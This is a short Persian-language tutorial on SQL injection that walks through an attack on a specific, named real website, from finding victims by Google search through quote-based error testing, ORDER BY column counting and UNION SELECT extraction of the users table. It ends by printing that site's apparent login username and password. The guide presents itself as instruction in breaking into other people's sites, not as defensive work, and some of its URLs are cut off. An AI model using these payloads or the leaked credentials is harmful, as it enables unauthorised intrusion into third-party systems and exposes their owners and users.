متن نویسه...
آموزش Sql Inject به زبان ساده
برای پیدا کردن قربانی در گوگل دنبال کلمات خواستی باید گشت که در این آموزش به علت طولانی بودن نمی گنجد؟
برای سرچ درگوگل ما از این عبارت استفاده کرده ایم : etemplate.php?id= حال شروع به آموزش میکنیم :
ابتدا سایت مورد نظرمان را باز میکنیم www.fespal.org سپس بر وری یکی از گزینه های سایت کلید میکنیم که ما در اینجا Die Friedrich-Ebert-Stiftung را انتخاب کرده ایم.
برای فهمیدن آسیب پذیری وب سایت مورد نظر مان در جلوی عدد که در آخر آدرس سایت آمده است یک کتیشن میگذاریم ( ' )
مثال : http://www.fespal.org/dtemplate.php?id=1' همان طور که ملاحظه میکنید چنین پیغامی را خواهد داد :
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/fespalo/public_html/dtemplate.php on line 96
سایت مورد نظر دارای باگ sql میباشد و قابلیت حمله را داراست برای فهمیدن تعداد کلوم های سایت به این صورت اقدام می کنید :
http://www.fespal.org/dtemplate.php?id=1+order+by+30-- عدد 30 به معنی این است که آیا تعداد کلوم 30 عدد است یا نه در صورت نبودن ازش کم میکنیم
http://www.fespal.org/dtemplate.php?id=1+order+by+20-- همان طور که ملاحظه میکنید تعداد کلوم سایت 20 عدد بود
حال به جای +order+by+21-- از union+select+ استفاده میکنیم و تمام کلوم ها را مینویسیم مثال : http://www.fespal.org/etemplate.php?...,17,18,19,20--
همان طور که میبینید 2 عدد 4 و 5 را داده است به جای آن user و password را وارد میکنیم به جای عدد 4 یوزر به جای عدد 5 پسورد
مثال : http://www.fespal.org/etemplate.php?...20+from+users-
در آخر به شما یوزر و پسورد لاگین سایت را خواهید دید
user : fespal pass: tHvRSg9PPG2MM
|